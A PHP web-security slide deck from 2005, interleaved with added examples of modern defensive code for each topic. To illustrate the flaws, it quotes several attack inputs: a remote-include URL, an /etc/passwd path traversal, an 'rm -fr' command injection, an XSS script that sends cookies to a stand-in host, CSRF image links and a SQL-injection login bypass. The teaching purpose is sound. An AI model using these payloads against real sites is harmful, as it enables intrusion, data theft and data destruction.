Segurança em PHP (PHP Security) - PowerPoint PPT Presentation

1
PHP Security (Segurança em PHP)
  • Examples and Practical Cases

Nuno Lopes, NEIIST 3rd Presentation Series (3º Ciclo de Apresentações).
17 March 2005
2
Agenda
  • Register Globals
  • Paths
  • Cross-Site Scripting (XSS)
  • Cross-Site Request Forgeries (CSRF)
  • SQL Injection
  • Session Hijacking
  • Links
  • Questions

4
Register Globals
  • An insecure PHP configuration
  • Do not use it / disable it!!

script.php?autenticado=1

<?php
// Vulnerable: with register_globals=On the request above has already
// created $autenticado = "1" before this code runs, so the second check
// passes without any credentials being presented.
if ($user == 'user' && $pass == 'pass')
    $autenticado = true;
if ($autenticado)
    mostra_info_confidencial();
?>

<?php
// Fixed: the script initialises the flag itself and reads its input
// explicitly from $_POST instead of trusting a global.
$autenticado = false;
if ($_POST['user'] == 'user' && (...))
?>
  • register_globals=Off
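The bypass above reproduced on a current PHP, as an added example that is not part of the original slides. register_globals was removed in PHP 5.4, so `extract()` is used here to emulate what it did (every request key becomes a local variable before the script's own logic runs); `mostra_info_confidencial()` is a stand-in for the page's protected action, and the request arrays are constructed.

```php
<?php
// Added example, not from the slides. register_globals was removed in
// PHP 5.4; extract() reproduces its effect on a request array.

function mostra_info_confidencial(): string
{
    return 'confidential data';          // stand-in for the real protected page
}

// Slide 4's vulnerable shape, with register_globals emulated. Nothing
// initialises $autenticado, so a request carrying autenticado=1 sets it
// to a truthy value before the credential check is even reached.
function vulnerable_page(array $request): ?string
{
    extract($request);                   // never do this with client input
    if (isset($user, $pass) && $user === 'user' && $pass === 'pass') {
        $autenticado = true;
    }
    if (!empty($autenticado)) {
        return mostra_info_confidencial();
    }
    return null;
}

// Slide 4's hardened shape: state is owned by the script and input is
// read explicitly from the request array; hash_equals() keeps the string
// comparison constant-time.
function hardened_page(array $post): ?string
{
    $autenticado = false;
    $user = (string) ($post['user'] ?? '');
    $pass = (string) ($post['pass'] ?? '');
    if (hash_equals('user', $user) && hash_equals('pass', $pass)) {
        $autenticado = true;
    }
    return $autenticado ? mostra_info_confidencial() : null;
}

// Constructed requests: the first carries no credentials at all.
$bypass = ['autenticado' => '1'];
$valid  = ['user' => 'user', 'pass' => 'pass'];

var_dump(vulnerable_page($bypass) !== null);   // injected flag is honoured
var_dump(hardened_page($bypass) !== null);     // injected flag is ignored
var_dump(hardened_page($valid) !== null);      // real credentials still work
```

Run from the command line the first and third checks are true and the second is false. The same lesson applies to any code that calls `extract()` or `parse_str()` on `$_GET`, `$_POST` or `$_REQUEST`: it recreates register_globals for that scope.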

6
Paths
  • Unsafe includes lead to remote code execution
  • Viewing of confidential files

script.php?file=http://attack.com/script
script.php?file=../../../../etc/passwd

<?php readfile($file); ?>
<?php include "$file.inc"; // becomes include "http://attack.com/script.inc" ?>
  • basename() / dirname()
  • realpath()
  • pathinfo()
  • allow_url_fopen=Off
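A path check built from the functions listed above, as an added example that is not part of the original slides. It confines a client-supplied name to one directory with `realpath()` and a canonical-prefix comparison, refuses URL schemes up front instead of relying on `allow_url_fopen` (note that since PHP 5.2 `allow_url_include` separately governs `include`/`require` of URLs), and replaces `include "$file.inc"` with a fixed page map. The temporary directory, its file, the page map and the sample inputs are all constructed for the demo.

```php
<?php
// Added example, not from the slides. Confines a user-supplied file name
// to one directory; directory, file and inputs below are constructed.

function safe_file_path(string $baseDir, string $userInput): ?string
{
    // Filesystem calls reject NUL bytes (PHP 8 throws), so check first;
    // a NUL is also the classic way to cut off an appended ".inc".
    if ($userInput === '' || strpos($userInput, "\0") !== false) {
        return null;
    }
    // Refuse URL schemes outright instead of relying on allow_url_fopen.
    if (preg_match('~^[a-z][a-z0-9+.-]*://~i', $userInput)) {
        return null;
    }
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $userInput);
    if ($base === false || $target === false) {
        return null;                     // base missing or file does not exist
    }
    // realpath() has resolved "..", "." and symlinks, so a prefix check on
    // the canonical paths is what actually confines the file to $baseDir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// For include, do not build "$file.inc" from input at all: map known page
// names to files and reject everything else.
const PAGE_FILES = ['home' => 'home.inc', 'about' => 'about.inc'];   // constructed

function include_file_for(string $page): ?string
{
    return PAGE_FILES[$page] ?? null;
}

// Constructed layout: <tmp>/docs/readme.txt is the only file meant to be served.
$baseDir = sys_get_temp_dir() . '/paths-demo-' . getmypid();
mkdir($baseDir . '/docs', 0700, true);
file_put_contents($baseDir . '/docs/readme.txt', "public document\n");

$inputs = [
    'docs/readme.txt',                                        // legitimate
    '../../../../etc/passwd',                                 // traversal, from the slide
    'http://attack.com/script',                               // remote file, from the slide
    "docs/readme.txt\0.inc",                                  // NUL-byte truncation
    'docs/../../' . basename($baseDir) . '/docs/readme.txt',  // leaves and re-enters; canonical path is inside
];
foreach ($inputs as $in) {
    $path = safe_file_path($baseDir, $in);
    printf("%-48s => %s\n", addcslashes($in, "\0"), $path === null ? 'REJECTED' : 'ok');
}
var_dump(include_file_for('home'), include_file_for('../etc/passwd'));

unlink($baseDir . '/docs/readme.txt');
rmdir($baseDir . '/docs');
rmdir($baseDir);
```

Only the first and last inputs are accepted: the last one looks like a traversal but canonicalises to the same file inside the base directory, which is why the decision is made on `realpath()` output rather than on pattern-matching the raw string. `basename()` alone is not a substitute, since it does nothing about a name that is itself `..` and cannot tell a symlink from a regular file.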

7
Paths
  • Command execution on the server

script.php?opts=-la; rm -fr
<?php system("ls $opts"); // becomes system("ls -la; rm -fr ") ?>
  • escapeshellarg()
  • escapeshellcmd()
  • safe_mode=On
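What the two escaping functions above each do to that payload, as an added example that is not part of the original slides. `escapeshellarg()` turns the whole value into one quoted argument; `escapeshellcmd()` neutralises shell metacharacters but leaves spaces alone, so it still permits argument injection; an allowlist of known flags avoids handing client input to a shell at all. (`safe_mode` was deprecated in PHP 5.3 and removed in 5.4, so it is no longer available as a defence.) The inputs and the flag allowlist are constructed; only the allowlisted command is actually executed.

```php
<?php
// Added example, not from the slides. Inputs below are constructed; the
// escaped commands are built and printed, not run.

// escapeshellarg(): the whole value becomes ONE single-quoted argument, so
// ";" and spaces lose their meaning to the shell.
function ls_command_arg(string $opts): string
{
    return 'ls ' . escapeshellarg($opts);
}

// escapeshellcmd(): metacharacters are backslash-escaped but spaces are
// not, so an attacker cannot chain a second command yet can still append
// arguments (for example extra file names) to the one being run.
function ls_command_cmd(string $opts): string
{
    return escapeshellcmd('ls ' . $opts);
}

// Allowlist: accept only known flags, so no escaping is ever needed.
function ls_command_allowlisted(string $opts): ?string
{
    $allowed = ['-l', '-a', '-la', '-h'];                 // constructed allowlist
    $flags = preg_split('/\s+/', trim($opts), -1, PREG_SPLIT_NO_EMPTY);
    foreach ($flags as $f) {
        if (!in_array($f, $allowed, true)) {
            return null;
        }
    }
    return 'ls ' . implode(' ', $flags);
}

$payload = '-la; rm -fr /';     // constructed attacker input, command chaining
$extra   = '-la /etc';          // constructed attacker input, argument injection only

foreach ([$payload, $extra] as $input) {
    echo ls_command_arg($input), PHP_EOL;
    echo ls_command_cmd($input), PHP_EOL;
    var_dump(ls_command_allowlisted($input));
}

// Only the allowlisted form is ever handed to the shell.
$cmd = ls_command_allowlisted('-la');
if ($cmd !== null) {
    passthru($cmd);
}
```

For the second input, `escapeshellcmd()` returns `ls -la /etc` unchanged: there is nothing to escape, and the directory listing the attacker chose is exactly what would run. That is the case the allowlist catches and the escaping functions do not.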

8
Paths
  • Password/credential theft

httpd.conf: never serve the .inc files that hold the credentials (Apache 2.2 syntax; Apache 2.4 expresses the same with Require all denied)
<Files ~ "\.inc$">
    Order allow,deny
    Deny from all
</Files>

/path/to/secret-stuff (readable by root only):
SetEnv DB_USER "myuser"
SetEnv DB_PASS "mypass"

httpd.conf (the values reach the script as $_SERVER['DB_USER'] and $_SERVER['DB_PASS'], so they never appear in PHP source):
Include "/path/to/secret-stuff"

10
Cross-Site Scripting (XSS)
  • Insertion of HTML/JavaScript into a page (through unfiltered variables)
  • Allows theft of sessions, passwords, etc.

<script>
document.location = 'http://example.org/steal_cookies.php?cookie=' + document.cookie;
</script>
  • strip_tags()
  • htmlentities() / htmlspecialchars()
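Output encoding for the two HTML contexts a comment usually lands in, as an added example that is not part of the original slides; it uses the cookie-stealing payload above and a second input aimed at an attribute, and shows why `strip_tags()` is a filter rather than an encoder. The comment template and both inputs are constructed.

```php
<?php
// Added example, not from the slides. Template and inputs are constructed.

function h(string $s): string
{
    // ENT_QUOTES encodes both quote characters so the result is safe inside
    // single- or double-quoted attributes as well as in element text; the
    // explicit charset stops multi-byte sequences from being mis-decoded.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_comment(string $author, string $comment): string
{
    return '<p class="comment" data-author="' . h($author) . '">'
         . h($comment) . '</p>';
}

$payload = "<script>document.location='http://example.org/steal_cookies.php?cookie='+document.cookie</script>";
$author  = 'x" onmouseover="alert(document.cookie)';   // breaks out of the attribute

echo render_comment($author, $payload), PHP_EOL;

// strip_tags() removes <script>...</script> but leaves the quote that closes
// the attribute, so the second input still becomes an event handler when it
// is filtered instead of encoded.
$unsafe = '<p data-author="' . strip_tags($author) . '">' . strip_tags($payload) . '</p>';
echo $unsafe, PHP_EOL;
```

In the encoded version every `<`, `>`, `"`, `'` and `&` in both inputs comes out as an entity, so the browser renders them as text; in the filtered version the `data-author` attribute is closed early and `onmouseover` is live. Encoding is chosen per output context, and for the session cookie itself the complementary control is the HttpOnly flag, which keeps it out of `document.cookie` in the first place.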

12
Cross-Site Request Forgeries (CSRF)
"sea surf"
  • A method little used in exploits (for now)
  • But very powerful and hard to defend against
  • Very widely applicable

[img]http://your.forums/newreply.php?action=newthread&subject=aaa&body=some+naughty+words&submit=go[/img]
<img src="http://192.168.0.1/admin/buy_stocks.php?number=all">
13
Cross-Site Request Forgeries (CSRF)
"sea surf"
  • There are no recipes; it depends on the application
  • Use POST instead of GET (this defeats the <img> trick above but not an auto-submitted form, so it is not sufficient on its own)
  • Force the use of your own forms via a random TOKEN
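The random-token defence from the last bullet, as an added example that is not part of the original slides. A per-session secret is generated with a CSPRNG, embedded in every state-changing form, and compared in constant time on submission; the forged request from the forum example above never carries it because the attacker cannot read the victim's session. A plain array stands in for `$_SESSION` so it runs from the command line, and the form markup and requests are constructed. (`random_bytes()` requires PHP 7; since PHP 7.3 `session.cookie_samesite` adds a second, browser-enforced layer.)

```php
<?php
// Added example, not from the slides. $session stands in for $_SESSION;
// form markup and the two requests are constructed.

function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));   // CSPRNG, PHP 7+
    }
    return $session['csrf_token'];
}

function csrf_valid(array $session, array $post): bool
{
    $expected = (string) ($session['csrf_token'] ?? '');
    $given    = (string) ($post['csrf_token'] ?? '');
    // hash_equals() is constant-time, so the token cannot be recovered
    // byte by byte from response timing.
    return $expected !== '' && hash_equals($expected, $given);
}

function new_thread_form(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/newreply.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="subject"><textarea name="body"></textarea>'
         . '<button name="submit" value="go">Post</button></form>';
}

function handle_new_thread(array $session, array $post): string
{
    if (!csrf_valid($session, $post)) {
        return 'refused: missing or invalid token';
    }
    return 'posted: ' . ($post['subject'] ?? '');
}

$session = [];
echo new_thread_form($session), PHP_EOL;

// The forged request from the slide's [img] trick: the attacker controls
// every parameter but never sees the victim's token.
$forged = ['action' => 'newthread', 'subject' => 'aaa', 'body' => 'some naughty words', 'submit' => 'go'];
echo handle_new_thread($session, $forged), PHP_EOL;

// A genuine submission of the form rendered above.
$legit = $forged + ['csrf_token' => $session['csrf_token']];
echo handle_new_thread($session, $legit), PHP_EOL;
```

The forged request is refused and the genuine one is posted. Because the check is on a secret the attacker's page cannot read, it holds regardless of whether the request is a GET, a POST, or an auto-submitted form.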

15
SQL Injection
  • Easy to avoid
  • Filter data by type
  • Quote string values
  • Do not display errors (i.e. mysql_error())

16
SQL Injection
script.php?user=admin' OR '1'='1&pass=

<?php
$sql = "SELECT * FROM tabela WHERE user='$user' AND pass='$pass'";
$q = mysql_query($sql) or die(mysql_error());   // also leaks the database error to the client
if (mysql_num_rows($q) == 1)
    $auth = true;
?>

Resulting query (AND binds tighter than OR, so the admin row matches regardless of the password):
SELECT * FROM tabela WHERE user='admin' OR '1'='1' AND pass=''
17
SQL Injection
  • Use explicit casts for integers
  • mysql_real_escape_string()
  • Hash the stored passwords (md5()/sha1())
  • Beware of wildcards (... LIKE '%aeiou%'): % and _ are not escaped by mysql_real_escape_string()
  • Watch out for multiple (stacked) queries

<?php
$an_int = (int) $_GET['an_int'];
if ($an_int < 0 || $an_int > 50)
    display_user_error();
?>
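The login from slide 16 beside its fixed form, plus the integer-cast and wildcard points from the bullets above, as an added example that is not part of the original slides. The `mysql_*` functions on the slides were removed in PHP 7, so this uses PDO with an in-memory SQLite database (the `pdo_sqlite` extension is assumed) and runs offline; bound parameters replace `mysql_real_escape_string()`, and `password_hash()`/`password_verify()` replace the unsalted `md5()`/`sha1()` the slide suggests, which are no longer adequate for passwords. The table, the two accounts and the inputs are constructed.

```php
<?php
// Added example, not from the slides. Uses PDO + in-memory SQLite
// (pdo_sqlite assumed); table, accounts and inputs are constructed.

ini_set('display_errors', '0');   // slide 15: never show database errors to the client

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tabela (id INTEGER PRIMARY KEY, user TEXT UNIQUE, pass TEXT)');
$ins = $db->prepare('INSERT INTO tabela (user, pass) VALUES (?, ?)');
// Stored as salted hashes; password_hash() replaces unsalted md5()/sha1().
$ins->execute(['admin', password_hash('s3cret', PASSWORD_DEFAULT)]);
$ins->execute(['bob_smith', password_hash('hunter2', PASSWORD_DEFAULT)]);

// Slide 16 shape: input concatenated into the query text. The quote in the
// user name ends the literal and the rest becomes SQL.
function vulnerable_login(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT * FROM tabela WHERE user='$user' AND pass='$pass'";
    return count($db->query($sql)->fetchAll()) == 1;
}

// Bound parameter: the whole user string is data, never SQL; the password
// is verified in PHP against the stored hash.
function hardened_login(PDO $db, string $user, string $pass): bool
{
    $st = $db->prepare('SELECT pass FROM tabela WHERE user = ?');
    $st->execute([$user]);
    $hash = $st->fetchColumn();
    return $hash !== false && password_verify($pass, $hash);
}

// Slide 17: integers are cast and range-checked before use.
function user_by_id(PDO $db, $raw): ?string
{
    $id = (int) $raw;
    if ($id < 1 || $id > 50) {
        return null;
    }
    $st = $db->prepare('SELECT user FROM tabela WHERE id = ?');
    $st->bindValue(1, $id, PDO::PARAM_INT);
    $st->execute();
    $user = $st->fetchColumn();
    return $user === false ? null : $user;
}

// Slide 17, wildcards: a bound parameter stops injection, but "%" and "_"
// inside the value still act as wildcards unless escaped, and the escape
// character has to be declared in the query.
function users_matching(PDO $db, string $fragment): array
{
    $escaped = strtr($fragment, ['\\' => '\\\\', '%' => '\\%', '_' => '\\_']);
    $st = $db->prepare("SELECT user FROM tabela WHERE user LIKE ? ESCAPE '\\'");
    $st->execute(['%' . $escaped . '%']);
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

$injectedUser = "admin' OR '1'='1";     // the slide's payload; pass left empty
var_dump(vulnerable_login($db, $injectedUser, ''));
var_dump(hardened_login($db, $injectedUser, ''));
var_dump(hardened_login($db, 'admin', 's3cret'));
var_dump(user_by_id($db, '1 OR 1=1'));  // the (int) cast keeps only the leading digit
var_dump(users_matching($db, '_'));     // only names containing a literal underscore
```

The vulnerable login accepts the injected user name with an empty password; the hardened one rejects it and still accepts the real credentials. The last call returns only `bob_smith`: without the `strtr()` step the `_` would match any single character and both accounts would be listed, which is the wildcard leak the bullet warns about.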
19
Session Hijacking
  • Session theft
  • Use SSL and lock the session to the IP (and to the client certificate)
  • Use cookies only (avoids URLs like script.php?PHPSESSID=jfh92lpgmc7s6fj and attacks via the HTTP Referer)
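The advice above applied with the session settings PHP offers today, as an added example that is not part of the original slides: the id is accepted only from a cookie, the cookie is restricted to TLS and hidden from scripts, the id is regenerated at login, and the session is bound to the client certificate rather than the IP (IP locking breaks users behind rotating proxies and mobile carriers). `SSL_CLIENT_M_SERIAL` is assumed to be the variable mod_ssl exports when client certificates are in use with `StdEnvVars` enabled; the two `$server` arrays are constructed. `session.use_strict_mode` needs PHP 5.5.2 and `session.cookie_samesite` PHP 7.3.

```php
<?php
// Added example, not from the slides. $server arrays are constructed;
// SSL_CLIENT_M_SERIAL is assumed to be the mod_ssl-exported variable.

// Accept the id only from the cookie, never from ?PHPSESSID=... in a URL
// (which also ends up in Referer headers), and refuse ids the server did
// not issue (stops session fixation).
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
ini_set('session.use_strict_mode', '1');       // PHP 5.5.2+
// The cookie travels only over TLS and is invisible to JavaScript, so the
// document.cookie theft from the XSS slide gets nothing.
ini_set('session.cookie_secure', '1');
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_samesite', 'Strict');  // PHP 7.3+

function client_fingerprint(array $server): string
{
    // Bind to the client certificate where one exists and fall back to the
    // User-Agent, which is weak but stable; the IP address is deliberately
    // left out.
    $parts = [
        $server['SSL_CLIENT_M_SERIAL'] ?? '',
        $server['HTTP_USER_AGENT'] ?? '',
    ];
    return hash('sha256', implode("\0", $parts));
}

function login(string $username, array $server): void
{
    // A fresh id on privilege change makes any id captured or planted
    // before login worthless.
    session_regenerate_id(true);
    $_SESSION['user'] = $username;
    $_SESSION['fp']   = client_fingerprint($server);
}

function session_is_valid(array $server): bool
{
    if (empty($_SESSION['user']) || empty($_SESSION['fp'])) {
        return false;
    }
    return hash_equals($_SESSION['fp'], client_fingerprint($server));
}

// Demo with constructed request environments; the CLI SAPI starts a
// session without sending a cookie, so this runs from the command line.
$victim   = ['SSL_CLIENT_M_SERIAL' => '0A1B2C', 'HTTP_USER_AGENT' => 'Mozilla/5.0'];
$attacker = ['HTTP_USER_AGENT' => 'curl/8.0'];

session_start();
login('alice', $victim);
var_dump(session_is_valid($victim));     // same client as at login
var_dump(session_is_valid($attacker));   // stolen id presented from elsewhere
```

On a real page the pattern is `session_start()` followed by `session_is_valid($_SERVER)`, destroying the session and redirecting to the login page when it fails. The fingerprint is a tripwire rather than a guarantee: an attacker who steals the cookie can also copy the User-Agent, which is why the cookie flags and TLS, which prevent the theft in the first place, matter more than the binding.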

21
Links
  • www.php.net/security
  • www.phpsec.org
  • www.owasp.org
  • www.securityfocus.com
  • www.phpsecure.info
  • www.net-force.nl
  • http://mega.ist.utl.pt/ncpl/pres/
